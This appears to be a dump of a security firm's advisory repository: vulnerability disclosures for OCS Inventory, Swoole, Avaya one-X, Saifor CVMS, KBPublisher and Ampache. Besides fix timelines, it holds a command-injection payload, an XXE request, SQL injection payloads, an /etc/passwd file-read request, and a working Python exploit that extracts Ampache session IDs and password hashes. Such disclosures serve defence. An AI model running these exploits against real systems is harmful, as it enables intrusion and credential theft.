18 | function runCommand($command = "", $fname) {
19 | $command = "perl ipdiscover-util.pl $command -xml -h=" . SERVER_READ . " -u=" . COMPTE_BASE . " -p=" . PSWD_BASE . " -d=" . DB_NAME . " -path=" . $fname;
20 | exec($command);
21 | }
22 | ```
23 | The perl script is executed as a system command via exec() function, where it takes as argument a text string where the parameters have been concatenated:
24 | ```php
25 | //ms_ipdiscover_analyse.php
26 | $pas = $protectedGet['rzo'];
27 | $values = look_config_default_values(array('IPDISCOVER_IPD_DIR'), '', array('IPDISCOVER_IPD_DIR' => array('TVALUE' => VARLIB_DIR)));
28 | $fname = $values['tvalue']['IPDISCOVER_IPD_DIR'];
29 | $file_name = $fname . "/ipd/" . $pas . ".ipd";
30 | //reset cache?
31 | if (is_defined($protectedPost['reset'])) {
32 | unlink($file_name);
33 | reloadform_closeme('', true);
34 | } else {
35 | if (!is_readable($file_name))
36 | runCommand("-cache -net=" . $pas, $fname);
37 | ```
38 | The parameters provided to the runCommand function lack any filtering, so it is possible to abuse this functionality in order to execute arbitrary commands on the OS. Since $pas is under the attacker's control (it takes its value from the GET parameter “rzo”), commands can be inserted by crafting a string like this one:
39 |
40 | ```bash
41 | perl ipdiscover-util.pl -cache -net=;id > /tmp/pwned;#-xml -h=...
42 | ```
43 | ## Impact
44 | An authenticated attacker can execute arbitrary system commands. This can be exploited within a valid session via CSRF.
45 |
46 | ## Recommendation
47 | Update to the latest version.
48 |
49 | ## Timeline
50 |
51 | * 05/06/2018 - Reported vulnerability to vendor
52 | * 05/06/2018 - Vendor ACK
53 | * 14/06/2018 - First fix attempt (bypassed)
54 | * 02/07/2018 - Correct fix
55 | * 30/07/2018 - Security Release with fix (OCS Inventory 2.5)
56 |
57 |
58 | #
59 |
60 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2018/CVE-2018-14473/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-14473: XML External Entity (XXE) in OCS Inventory
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ OCS Inventory
6 | __Vendor URL:__ https://ocsinventory-ng.org
7 | __Versions affected:__ OCS Inventory <= 2.4.1
8 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2018/CVE-2018-14473/))
11 |
12 |
13 |
14 | ## Summary
15 | Due to an inadequate configuration, it is possible to use external entities which, when processed by the XML parser, allow the exfiltration of sensitive information from the machine.
16 |
17 | ## Details
18 | The communication between the agents and the master server of OCS Inventory is done through the HTTP protocol, sending the information against an endpoint. The information is structured in the form of XML, being parsed by the server to extract the data.
19 | As a proof of concept, a local web server can be started on the tester’s machine as a canary, and the following request sent to the vulnerable endpoint:
20 |
21 | ```
22 | POST /ocsinventory HTTP/1.1
23 | Host: xxxxxxxxxxxxxxx
24 | User-Agent: OCS-NG_WINDOWS_AGENT_v2.3.1.1
25 | Accept: */*
26 | Content-Type: application/xml
27 | Content-Length: 160
28 | Expect: 100-continue
29 | Connection: close
30 |
31 |
33 |
34 | >
35 | &sp;
36 | ```
37 |
38 | When the XML is processed, the entity &sp; expands and the OCS Inventory server makes a request to the canary, confirming the existence of the vulnerability.
39 |
40 | ## Impact
41 | An attacker can exfiltrate sensitive information from the machine.
42 |
43 | ## Recommendation
44 | Update the software to the latest version.
45 |
46 | ## Timeline
47 |
48 | * 05/06/2018 - Reported vulnerability to vendor
49 | * 05/06/2018 - Vendor ACK
50 | * 14/06/2018 - First fix attempt (bypassed)
51 | * 02/07/2018 - Correct fix
52 | * 30/07/2018 - Security Release with fix (OCS Inventory 2.5)
53 |
54 |
55 | #
56 |
57 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2018/CVE-2018-15503/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-15503: Memory corruption via deserialization in Swoole
2 | []() []() []()
3 |
4 | __Vendor:__ Swoole
5 | __Vendor URL:__ https://www.swoole.co.uk
6 | __Versions affected:__ Swoole <= 4.0.4
7 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/thexc3ll))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ Yes ([ref](https://github.com/X-C3LL/PoC-CVEs/tree/master/CVE-2018-15503))
10 | ## Summary
11 | The unpack implementation in Swoole version 4.0.4 lacks correct size checks in the deserialization process. An attacker can craft a serialized object to exploit this vulnerability and cause memory corruption.
12 |
13 | ## Details
14 | Proof of concept to leak 255 bytes:
15 |
16 | ```php
17 | unpack($sor);
22 | echo "[+] Swoole Unserialized:\n";
23 | var_dump($ser);
24 | echo "[+] Memory Leaked:\n";
25 | $keys = key(get_object_vars($ser[1]));
26 | echo bin2hex($keys);
27 | echo "\n[+] Size: \n";
28 | echo strlen($keys);
29 | ?>
30 | ```
31 | ## Impact
32 | This vulnerability can be abused to bypass server mitigations and execute arbitrary code.
33 |
34 | ## Recommendation
35 | Update to the latest version.
36 |
37 | ## Timeline
38 | * 14/08/2018 - Reported vulnerability to vendor
39 | * 15/08/2018 - Fix released in Github
40 |
41 | #
42 |
43 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
44 |
--------------------------------------------------------------------------------
/2018/CVE-2018-15610/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-15610: Avaya one-X portal arbitrary OS file access
2 | []() []() []()
3 |
4 | __Vendor:__ Avaya
5 | __Vendor URL:__ https://support.avaya.com/products/P0482/avaya-onex-portal
6 | __Versions affected:__ Multiple versions and products (check the details section to view the full list)
7 | __Discovered by:__ Pedro Andujar ([@pandujar](https://twitter.com/pandujar))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 | one-X Portal for IP Office is an application that runs on a web server connected to the IP Office telephone system. Using a web browser, one can access
14 | the one-X Portal for IP Office and use it to perform actions such as:
15 |
16 | * Control your telephone calls
17 | * View details of calls and directories of contacts
18 | * Configure settings that affect how your calls are treated by the telephone system
19 | * Conference calls
20 | * Manage your voicemail messages
21 |
22 | ## Details
23 | Avaya one-X for IP Office contains a default low-privileged account, which has limited access to the application and is intended to perform backup duties.
24 |
25 | An arbitrary file download issue was found in the backup portal, affecting both the Linux and Windows versions of the 9.x, 10.0.x and 10.1.x series. An
26 | authenticated remote attacker could send a specially crafted request, leading to potential information disclosure and DoS.
27 |
28 | DownloadToLocalDriveServlet allows any operating system file to be downloaded.
29 |
30 | ```
31 | <<>>
32 | GET /path/to/DownloadToLocalDriveServlet**REDACTED** HTTP/1.1
33 | Host: 192.168.1.38
34 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
35 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
36 | Accept-Language: en-US,en;q=0.5
37 | Accept-Encoding: gzip, deflate
38 | Referer: https://192.168.1.38/onexportal-afa.html
39 | Cookie: JSESSIONID=740B74DC4B77E0B8EB8F4FED6BA5EAE8;
40 | Connection: close
41 | Upgrade-Insecure-Requests: 1
42 |
43 | <<>>
44 | HTTP/1.1 200 OK
45 | Server: Apache-Coyote/1.1
46 | Content-Disposition: attachment; filename=passwd;
47 | Content-Type: application/zip
48 | Date: Mon, 19 Mar 2018 20:38:39 GMT
49 | Connection: close
50 | Content-Length: 1910
51 |
52 | root:x:0:0:root:/root:/bin/bash
53 | bin:x:1:1:bin:/bin:/sbin/nologin
54 | daemon:x:2:2:daemon:/sbin:/sbin/nologin
55 | adm:x:3:4:adm:/var/adm:/sbin/nologin
56 | lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
57 | sync:x:5:0:sync:/sbin:/bin/sync
58 | ...
59 | ```
60 |
61 | This request also deletes the file after it is downloaded (depending on the OS file and process permissions). Be careful on the Windows version, as the process runs with
62 | system privileges.
63 |
64 | Vulnerable piece of code:
65 |
66 | ```java
67 | if (sessionManager.isSessionAlive(session)) {
68 | String folder = req.getParameter("folder");
69 | String filename = req.getParameter("filename");
70 | if (logger.isDebugEnabled()) logger.debug(new Object[] { "doGet(), folder:", Helper.reformatFolderPath(folder), ", filename: ", filename });
71 | BufferedOutputStream bos = null;
72 | FileInputStream in = null;
73 | try {
74 | resp.setContentType("application/zip");
75 | resp.setHeader("Content-Disposition", "attachment; filename=" + filename + ";");
76 | bos = new BufferedOutputStream(resp.getOutputStream());
77 | in = new FileInputStream(Helper.reformatFolderPath(folder) + filename)
78 |
79 | ```
80 |
81 |
82 | ## Impact
83 | This vulnerability can be used to download arbitrary files and even to cause a DoS due to file removal.
84 |
85 | ## Recommendation
86 | DownloadToLocalDriveServlet is only intended to download backup zip files from the server to the desktop. The default backup folder is a predefined setting that
87 | appears as the serverFolderForBackup directive in the $TOMCAT\bin\inyama-user.xml file, and therefore does not need to be passed through a GET parameter.
88 |
89 | ```java
90 | String serverFolder = loggedInUser.getServerFolder() + File.separator;
91 | File downloadedFile = new File(Helper.reformatFolderPath(serverFolder), fileName);
92 | ```
93 |
94 | - Implement file type checks and enforce/append the .zip extension (this is also recommended for UploadFromLocalServlet.class, which allows arbitrary file upload
95 | but at least enforces the destination folder)
96 |
97 | - Avoid sending the filename as a GET parameter, or ensure path traversal protection is in place
98 |
99 | https://downloads.avaya.com/css/P8/documents/101051984
100 |
101 | * For 10.0.x, upgrade to IP Office one-X portal 10.0.702.16
102 | * For 10.1.x, upgrade to IP Office one-X portal 10.1.300.12
103 | * Fix is also provided in 11.0 or later
104 |
105 | Avaya strongly recommends following networking and security best practices by implementing firewalls, ACLs, physical security or other appropriate access restrictions. Though Avaya believes such restrictions should always be in place, risk to Avaya products and the surrounding network from this potential
106 | vulnerability may be mitigated by ensuring these practices are implemented until such time as an Avaya provided product update or the recommended Avaya action is applied. Further restrictions as deemed necessary based on the customer's security policies may be required during this interim period, but the
107 | System Product operating system or application should not be modified unless the change is approved by Avaya. Making changes that are not approved may void the Avaya product service contract.
108 |
109 | ## Timeline
110 | * 18/03/2018 - Vuln discovered during pentest engagement
111 | * 19/03/2018 - Avaya product security contacted
112 | * 19/03/2018 - Avaya product security replied
113 | * 23/03/2018 - Avaya product security confirmed and planned fix
114 | * 23/07/2018 - Fix available to customers
115 | * 31/08/2018 - Public disclosure
116 |
117 | (Kudos to the ProductSec Team for the excellent communication and incident handling)
118 |
119 |
120 | #
121 |
122 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
123 |
--------------------------------------------------------------------------------
/2018/CVE-2018-6792/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2018-6792: Multiple SQL injections in Saifor CVMS Hub
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ Saifor
6 | __Vendor URL:__ http://saifor.com
7 | __Versions affected:__ CVMS Hub <= 1.3.1
8 | __Discovered by:__ José Manuel Aparicio ([@jm_aparicio](https://twitter.com/jm_aparicio))
9 | __Public fix:__ No
10 | __Proof of Concept:__ No
11 |
12 | ## Summary
13 | An attacker can execute arbitrary SQL queries because the application does not validate the parameters received.
14 |
15 | ## Details
16 | Multiple SQL injection vulnerabilities in CVMS HUB 1.3.1 allow an authenticated user to execute arbitrary SQL queries via multiple POST parameters to /cvms-hub/privado/seccionesmib/secciones.xhtml.
17 |
18 | The following parameters are likely vulnerable:
19 | ```
20 | formularioGestionarSecciones:tablaSeccionesMib:j_idt118:filter
21 | formularioGestionarSecciones:tablaSeccionesMib:j_idt120:filter
22 | formularioGestionarSecciones:tablaSeccionesMib:j_idt122:filter
23 | formularioGestionarSecciones:tablaSeccionesMib:j_idt124:filter
24 | formularioGestionarSecciones:tablaSeccionesMib:j_idt126:filter
25 | formularioGestionarSecciones:tablaSeccionesMib:j_idt128:filter
26 | formularioGestionarSecciones:tablaSeccionesMib:j_idt130:filter
27 | ```
28 |
29 | Likewise, SQL injection exists in /cvms-hub/privado/seccionesmib/secciones.xhtml via GET parameter 'nombreAgente'.
30 |
31 | ## Impact
32 | An attacker can execute arbitrary SQL queries in the backend.
33 |
34 | ## Recommendation
35 | There is no fix for this vulnerability.
36 |
37 | ## Timeline
38 | * 21/12/2017 - Vulnerability reported to vendor (No response)
39 | * 23/01/2018 - Vulnerability reported to vendor (No Response)
40 | * 06/02/2018 - Full disclosure after 45 days (https://www.cert.org/vulnerability-analysis/vul-disclosure.cfm)
41 |
42 | #
43 |
44 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
45 |
--------------------------------------------------------------------------------
/2019/CVE-2019-10687/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-10687: Multiple SQL Injection in KBPublisher
2 | ## Software
3 | []() []() []()
4 |
5 | __Vendor:__ KBPublisher
6 | __Vendor URL:__ https://www.kbpublisher.com
7 | __Versions affected:__ KBPublisher 6.0.2.1
8 | __Discovered by:__ Pedro Andujar ([@pandujar](https://twitter.com/pandujar))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ No
11 |
12 |
13 | ## Summary
14 | KBPublisher release 6.0.2, and probably prior versions, contain multiple SQLi vulnerabilities that affect not only the admin interface but also the public (unauthenticated)
15 | area of the application.
16 |
17 | ## Details
18 |
19 | Affected URLs in the admin area (the POST parameters are affected as well):
20 |
21 | ```
22 | https://SITE/admin/index.php?module=report&page=report_entry&entry_id%5B0%5D=325PAYLOAD&filter%5Bt%5D=1&ajax=1
23 | ```
24 |
25 | ```
26 | https://SITE/admin/index.php?module=log&page=login_log&action=detail&id=PAYLOAD
27 | ```
28 |
29 | The publicly accessible URL corresponds to the print feature:
30 |
31 | ```
32 | https://SITE/index.php?View=print&id%5B%5D=PAYLOAD
33 | ```
34 |
35 | ## Impact
36 | This vulnerability can be abused to extract users and password hashes from the database.
37 |
38 | ## Recommendation
39 | Upgrade to version 7.0 or higher.
40 |
41 | ## Timeline
42 | * 21/Mar/2019: - Vuln discovered during engagement.
43 | * 21/Mar/2019: - KBP product security contacted.
44 | * 22/Mar/2019: - Replied providing a workaround.
45 | * 30/Apr/2019: - New release of KBP released to public.
46 | * 21/Aug/2019: - Public disclosure.
47 |
48 | #
49 |
50 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
51 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12385/CVE-2019-12385.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #
3 | # CVE-2019-12385.py - SQL Injection
4 | #
5 | # Software: Ampache <= 3.9.1
6 | # Author: Pablo Martinez (@xassiz) from BlackArrow
7 | # Details: https://github.com/blackarrowsec/advisories/tree/master/2019/CVE-2019-12385
8 | # Web: [www.blackarrow.net] - [www.tarlogic.com]
9 | #
10 |
11 |
12 | import re
13 | import sys
14 | import string
15 | import requests
16 | import argparse
17 |
class Ampawn():
    """HTTP client used by the CVE-2019-12385 proof of concept (Ampache <= 3.9.1).

    Every oracle request goes to ``<url>/search.php?type=song`` with a fixed
    header set and a ``rule_1=last_play`` search whose ``rule_1_input`` value
    is the caller-supplied payload. Whether the response lists at least one
    song is the only signal read back (see ``check``).

    Error handling is process-level: ``check`` and ``get_username_by_id`` call
    ``sys.exit`` on an auth redirect or non-200 status instead of raising, so
    the class is not reusable as a library.

    Python 2 only: ``print`` statements, ``str.encode('hex')`` and
    ``string.lowercase`` do not exist in Python 3. Indentation below is
    reconstructed from a flattened listing.
    """

    def __init__(self, url, cookie=None, proxy=None, debug=False):
        """Keep the target base URL and the per-request options.

        :param url: base URL of the Ampache instance, without trailing slash
            (it is concatenated with ``/search.php`` and ``/stats.php``).
        :param cookie: value for the ``ampache`` session cookie; ``None``
            sends no cookies at all.
        :param proxy: passed unchanged as ``proxies=`` to ``requests``.
        :param debug: when true, ``dump`` prints each partial result.
        """
        self.url = url
        self.cookies = { "ampache": cookie } if cookie else None
        self.proxy = proxy
        self.debug = debug
        # Identical on every request; from the server side the constant
        # User-Agent / X-Requested-With pair is a convenient log fingerprint.
        self.headers = {
            "X-Requested-With": "XMLHttpRequest",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "Accept-Encoding": "gzip, deflate",
            "Connection": "close"
        }

    def check(self, payload):
        """Run one search with ``payload`` as ``rule_1_input`` and report whether it matched.

        :param payload: text placed verbatim in the ``rule_1_input`` field.
        :return: the ``re`` match object when the HTML contains a
            ``song_<digits>"`` fragment (the search returned rows), otherwise
            ``None``. Callers use the result as a boolean.
        :raises SystemExit: code 2 on a 302 whose ``Location`` ends in
            ``/login.php`` (session required or expired), code 3 on any other
            non-200 status.
        """
        url = "%s/search.php?type=song" % self.url

        data = {
            "limit": "0",
            "operator": "or",
            "rule_1": "last_play",
            "rule_1_operator": "1",
            "rule_1_input": "%s" % payload,
            "action": "search"
        }
        # allow_redirects=False so the login redirect is observable below.
        r = requests.post(url, headers=self.headers, cookies=self.cookies, data=data, proxies=self.proxy, allow_redirects=False)

        if r.status_code == 302:
            # NOTE(review): a 302 without a Location header makes
            # headers.get('Location') None and the slice raises TypeError;
            # a 302 to any other location falls through and is handled
            # like a 200.
            if r.headers.get('Location')[-10:] == '/login.php':
                print "[-] Auth failed"
                sys.exit(2)
        elif r.status_code != 200:
            print "[-] Error code: %d" % r.status_code
            sys.exit(3)

        return re.search('song_\d*"', r.text)

    def dump(self, pattern, size=26, charset=None):
        """Recover a ``size``-character string one position at a time by bisecting ``charset``.

        For position ``p`` (1-based in the payload) the candidate set ``c``
        starts as ``charset`` and is halved on every iteration: ``pattern`` is
        formatted with ``(p+1, hex(lower half))`` and ``check`` selects the
        upper half when it matches, the lower half otherwise, until a single
        character remains and is appended to ``full``.

        :param pattern: ``%``-format string with exactly two slots, an
            integer position and a hex string, in that order.
        :param size: number of characters to recover.
        :param charset: non-empty string of candidate characters. The
            ``None`` default is not usable: ``len(c)`` raises ``TypeError``.
        :return: the recovered string (``size`` characters).

        Each position costs about ``ceil(log2(len(charset)))`` requests, so a
        64-character dump over 16 candidates is roughly 256 POSTs in a row --
        a burst that stands out in access logs.
        """
        full = ''
        for p in range(size):
            c = charset

            while len(c) > 1:
                middle = len(c) // 2
                h0, h1 = c[:middle], c[middle:]
                # Python 2 only: str.encode('hex').
                payload = pattern % (p+1, h0.encode('hex'))
                c = h1 if self.check(payload) else h0

            full += c

            if self.debug:
                print "[debug] Partial result: %s" % full

        return full

    def is_vulnerable(self):
        """Differential probe: a true condition must match and a false one must not.

        :return: truthy only when ``check`` succeeds for the ``1=1`` form and
            fails for the ``1=0`` form; a target that answers both the same
            way (always or never returning songs) is reported as not
            vulnerable.
        """
        pattern = '1))union select 1 from dual where %s--'
        return self.check(pattern % '1=1') and not self.check(pattern % '1=0')

    def get_user_session(self, condition):
        """Recover the id of the session row with the latest ``expire`` matching ``condition``.

        :param condition: SQL fragment interpolated unescaped into the
            ``WHERE`` clause (built by the ``__main__`` block).
        :return: ``None`` when the count probe finds no session row, else a
            26-character string over ``[a-z0-9]`` from ``dump``.

        ``%%`` in ``pattern`` survives the first ``%`` formatting as a single
        ``%`` so that ``dump`` can fill in the position and hex slots later.
        """
        count = '1))union select 1 from dual where (select count(*) from session where %s)>0--' % condition
        if not self.check(count):
            return None
        else:
            pattern = '1))union select 1 from (select 1 from session where %s and LOCATE(SUBSTR(id,%%d,1),BINARY 0x%%s)=0 order by expire DESC limit 1)t--' % condition
            return self.dump(pattern, size=26, charset=string.lowercase + string.digits)

    def get_user_password_hash(self, condition):
        """Recover the 64-hex-character password hash of the single user matching ``condition``.

        :param condition: SQL fragment interpolated unescaped into the query.
        :return: ``None`` unless exactly one ``user`` row matches (the probe
            tests ``count(*) = 1``, unlike ``get_user_session`` which tests
            ``> 0``), else the 64-character lowercase hex string from
            ``dump``.
        """
        count = '1))union select 1 from dual where (select count(*) from user where %s)=1--' % condition
        if not self.check(count):
            return None
        else:
            pattern = '1))union select 1 from user where %s and LOCATE(SUBSTR(password,%%d,1),BINARY 0x%%s)=0 limit 1--' % condition
            return self.dump(pattern, size=64, charset='abcdef0123456789')

    def get_username_by_id(self, id):
        """Read the display name shown on ``stats.php?action=show_user`` for a user id.

        :param id: user id; ``int(id)`` is applied first, so a non-numeric
            value raises ``ValueError`` before any request is made. (The
            parameter name shadows the ``id`` builtin.)
        :return: the second capture of the ``Display Name`` regex, stripped,
            or ``None`` when the regex does not match.
        :raises SystemExit: same exit codes as ``check`` on 302 / non-200.
        """
        r = requests.get("%s/stats.php?action=show_user&user_id=%d" % (self.url, int(id)), headers=self.headers, cookies=self.cookies, proxies=self.proxy, allow_redirects=False)

        if r.status_code == 302:
            if r.headers.get('Location')[-10:] == '/login.php':
                print "[-] Auth failed"
                sys.exit(2)
        elif r.status_code != 200:
            print "[-] Error code: %d" % r.status_code
            sys.exit(3)

        try:
            res = re.search('Display Name\n(.*)even">\n(.*)<', r.text)
            return res.group(2).strip()
        except:
            # NOTE(review): the expected failure is AttributeError from
            # ``res`` being None; a bare except also swallows
            # KeyboardInterrupt and SystemExit.
            return None
110 |
111 |
if __name__ == '__main__':
    # Command-line front end for Ampawn. Only --url is required; --check,
    # --get-session and --get-password select the actions and --user / --id
    # pick the target account (default: id=1). Indentation reconstructed
    # from a flattened listing; the placement of sys.exit(1) under --check
    # is the most plausible reading, not verifiable here.

    parser = argparse.ArgumentParser()
    parser.add_argument("--url", help="URL of the target Ampache instance", required=True)
    parser.add_argument("--session", help="Session ID (if auth required)")
    parser.add_argument("--proxy", help="Proxy (optional)")
    parser.add_argument("--check", help="Check if target is vulnerable", action='store_true')
    parser.add_argument("--debug", help="Print debug information", action='store_true')
    parser.add_argument("--get-session", help="Dumps a user session cookie ", action='store_true')
    parser.add_argument("--get-password", help="Dumps a user password hash", action='store_true')
    parser.add_argument("--user", help="Target username (default: user with id=1)")
    parser.add_argument("--id", help="Target user id (default: user with id=1)")

    args = parser.parse_args()

    # One proxy for both schemes, in the dict shape ``requests`` expects.
    proxy = {'http':args.proxy, 'https':args.proxy} if args.proxy else None

    if args.session:
        pwn = Ampawn(args.url, args.session, proxy=proxy, debug=args.debug)
    else:
        pwn = Ampawn(args.url, proxy=proxy, debug=args.debug)

    print "[+] Target: %s" % args.url

    if args.check:
        if pwn.is_vulnerable():
            print "[+] Target is vulnerable"
        else:
            print "[-] Target is not vulnerable"
            sys.exit(1)

    # ``condition`` is a raw SQL fragment. --user is hex-encoded (Python 2
    # str.encode('hex')); --id is interpolated as given, with no int()
    # validation at this point (get_username_by_id does apply int()).
    if args.user:
        condition = "username=0x%s" % args.user.encode('hex')
        print "[+] Retrieving info for user '%s'..." % args.user
    elif args.id:
        condition = "id=%s" % args.id
        print "[+] Retrieving info for user with id=%s..." % args.id
        username = pwn.get_username_by_id(args.id)
        if username:
            print "[+] Username: %s" % username
    else:
        condition = "id=1"
        args.id = 1
        print "[+] Retrieving info for user with id=1..."
        username = pwn.get_username_by_id(args.id)
        if username:
            print "[+] Username: %s" % username

    if args.get_session:
        if args.id:
            # An id condition refers to the user table; wrap it so the
            # session table can be filtered by username instead.
            condition = 'username=(select username from user where %s)' % condition

        session_id = pwn.get_user_session(condition)
        if session_id:
            print "[+] Session = %s" % session_id
        else:
            print "[-] User has no active session"

    if args.get_password:
        # ``hash`` shadows the builtin of the same name.
        hash = pwn.get_user_password_hash(condition)
        if hash:
            print "[+] Password = %s" % hash
        else:
            print "[-] User not found"
176 |
177 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12385/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-12385: SQL injection in Ampache
2 | ## Software
3 | []() []() []()
4 |
5 | __Vendor:__ Ampache
6 | __Vendor URL:__ http://ampache.org
7 | __Versions affected:__ Ampache <= 3.9.1
8 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-12385/CVE-2019-12385.py))
11 |
12 |
13 |
14 | ## Summary
15 | The search engine is affected by a SQL Injection, so any user able to perform lib/class/search.class.php searches (even guest users) can dump any data contained in the database (sessions, hashed passwords, etc.).
16 |
17 | ## Details
18 | Communication with the database is made via the Dba class (ORM), which relies on PHP PDO to perform queries. Some of them are performed properly using prepared statements, but in other cases the Dba::escape method is used.
19 |
20 | lib/class/dba.class.php:
21 |
22 | ```php
23 | 134: public static function escape($var)
24 | 135: {
25 | 136: $dbh = self::dbh();
26 | 137: if (!$dbh) {
27 | 138: debug_event('Dba', 'Wrong dbh.', 1);
28 | 139: exit;
29 | 140: }
30 | 141: $var = $dbh->quote($var);
31 | 142: // This is slightly less ugly than it was, but still ugly
32 | 143: return substr($var, 1, -1);
33 | 144: }
34 | ```
35 |
36 | This function calls PDO::quote, which filters special characters and quotes the string. After that, outer single quotes are stripped. The latter means that if this value is not quoted within the query, an attacker could inject data in SQL context.
37 |
38 | A vulnerable case supporting this theory is detailed below, although there could be more.
39 |
40 | lib/class/search.class.php:
41 |
42 | ```php
43 | 1461: case 'last_play':
44 | 1462: $userid = $GLOBALS['user']->id;
45 | 1463: $where[] = "`object_count`.`date` IS NOT NULL AND `object_count`.`date` $sql_match_operator (UNIX_TIMESTAMP() - ($input * 86400))";
46 | 1464: $join['object_count'] = true;
47 | 1465: break;
48 | ```
49 | The $input variable is basically:
50 | ```
51 | Dba::escape($USER_INPUT)
52 | ```
53 |
54 | So a malicious user could provide SQL commands (avoiding quotes and other special chars). The following request confirms the vulnerability, causing a 5-second delay:
55 |
56 | ```
57 | POST /search.php?type=song
58 | X-Requested-With: XMLHttpRequest
59 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
60 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
61 | Accept-Encoding: gzip, deflate
62 | Accept-Language: es-ES,es;q=0.9,en;q=0.8,pt;q=0.7
63 | Cookie: ampache=[session_id]
64 | Connection: close
65 |
66 | limit=0&operator=or&rule_1=last_play&rule_1_operator=1&rule_1_input=1))union+select+1+from+dual+where+sleep(5)--&action=search
67 | ```
68 |
69 |
70 | ## Impact
71 | This vulnerability may lead to a full compromise of admin accounts, when combined with the weak password generator algorithm used in the lostpassword functionality.
72 |
73 | ## Recommendation
74 | Update to the latest version.
75 |
76 | ## Timeline
77 |
78 | * 25/04/2019 - Reported vulnerability to vendor
79 | * 24/06/2019 - First fix attempt
80 | * 25/06/2019 - Incorrect fix notification
81 | * 25/06/2019 - Final fix at Github
82 |
83 | #
84 |
85 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
86 |
87 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12386/CVE-2019-12386.html:
--------------------------------------------------------------------------------
1 |
2 | CVE-2019-12386 - Stored XSS + CSRF
3 |
4 | Software: Ampache <= 3.9.1
5 | Author: Juan Manuel Fernandez (@TheXC3LL) from BlackArrow
6 | Details: https://github.com/blackarrowsec/advisories/new/master/2019/CVE-2019-12386
7 | Web: [www.blackarrow.net] - [www.tarlogic.com]
8 |
9 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/2019/CVE-2019-12386/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-12386: Stored XSS in Ampache
2 | []() []() []()
3 |
4 |
5 | __Vendor:__ Ampache
6 | __Vendor URL:__ http://ampache.org
7 | __Versions affected:__ Ampache <= 3.9.1
8 | __Discovered by:__ Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL))
9 | __Public fix:__ Yes
10 | __Proof of Concept:__ Yes ([ref](https://github.com/blackarrowsec/advisories/blob/master/2019/CVE-2019-12386/CVE-2019-12386.html))
11 |
12 |
13 | ## Summary
14 | Ampache 3.9.1 (and before) is vulnerable to stored XSS because user parameters are used without proper sanitization.
15 |
16 | ## Details
17 |
18 | A stored XSS exists in the localplay.php LocalPlay "add instance" functionality. The injected code is reflected in the instances menu. This vulnerability can be abused to force an admin to create a new privileged user whose credentials are known by the attacker.
19 |
20 | ## Impact
21 | This vulnerability can be abused to force an admin to create a new privileged user whose credentials are known by the attacker.
22 |
23 | ## Recommendation
24 | Update to the latest version.
25 |
26 | ## Timeline
27 |
28 | * 25/04/2019 - Reported vulnerability to vendor
29 | * 24/06/2019 - First fix attempt
30 | * 25/06/2019 - Incorrect fix notification
31 | * 25/06/2019 - Final fix at Github
32 |
33 | #
34 |
35 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
--------------------------------------------------------------------------------
/2019/CVE-2019-12386/pwn.js:
--------------------------------------------------------------------------------
1 | /*
2 | CVE-2019-12386: Stored XSS in Ampache
3 |
4 | Software: Ampache <= 3.9.1
5 | Author: Juan Manuel Fernandez (@TheXC3LL) from BlackArrow
6 | Details: https://github.com/blackarrowsec/advisories/new/master/2019/CVE-2019-12386
7 | Web: [www.blackarrow.net] - [www.tarlogic.com]
8 |
9 |
10 | */
11 |
/*
 * Fill in and submit the "add user" form inside the iframe with id "pwn".
 *
 * This runs in the page of the already-authenticated admin (the stored XSS
 * described in the README), so the iframe is same-origin and its
 * contentDocument is readable; for a cross-origin frame the access would
